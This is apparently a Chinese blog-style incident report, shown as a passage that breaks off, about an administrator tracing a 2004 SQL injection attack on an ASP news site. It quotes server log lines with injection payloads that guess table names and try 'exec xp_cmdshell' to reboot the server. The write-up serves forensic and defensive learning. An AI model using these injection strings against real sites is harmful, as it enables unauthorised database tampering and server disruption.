+设为首页 +添加到收藏夹
时间:中午13:30
经过分析,数据库被非法修改.因为用户名被设为主键,正常情况下不会重复. 【程序编程相关:对 API 发展的简单认识】
接到实验室电话,说网站信息发布系统(旧版)用户无法登陆,察看数据库后发现所有用户名与密码均被改为 admin ,未发现其它改动. 【推荐阅读:我见过的最长的表达式】
时间:下午15:30 【扩展信息:墨卡托投影】
到实验室察看服务器.服务器系统为 win2003 + iis6.0,系统是asp编写的,数据库为 sql-server 2000.
用备份恢复用户表. 察看系统安全日志,发现以下记录: 2004-09-08 03:32:20 get /news/showmsg.asp id=1190%20and%20exists(select%20*%20from%20admin)|24|80040e37|[microsoft][odbc_sql_server_driver][sql_server]对象名_´admin´_无效. 80 - 211.157.253.134 500 系统存在sql注入漏洞!入侵在猜用户表,查找所有211.157.253.134的操作记录,原来才了好多次,并且猜中了: 2004-09-08 03:32:31 get /news/showmsg.asp id=1190%20and%20exists(select%20*%20from%20user)|24|80040e14|[microsoft][odbc_sql_server_driver][sql_server]在关键字_´user´_附近有语法错误. 80 - 211.157.253.134 500 下面要开始做动作了吧,继续看 2004-09-08 03:33:58 get /news/showmsg.asp id=1190%20and%20exists(select%20*%20from%20news)|24|80040e37|[microsoft][odbc_sql_server_driver][sql_server]对象名_´news´_无效. 80 - 211.157.253.134 500 又猜了几次信息表,还好表名比较特别,最终没猜出来. 2004-09-08 03:36:01 get /news/showmsg.asp id=1190;exec%20xp_cmdshell%20´iisreset%20/reboot%20/now´|194|80004005|[microsoft][odbc_sql_server_driver][sql_server]未能找到存储过程_´xp_cmdshell´. 80 - 211.157.253.134 500 ... 下一页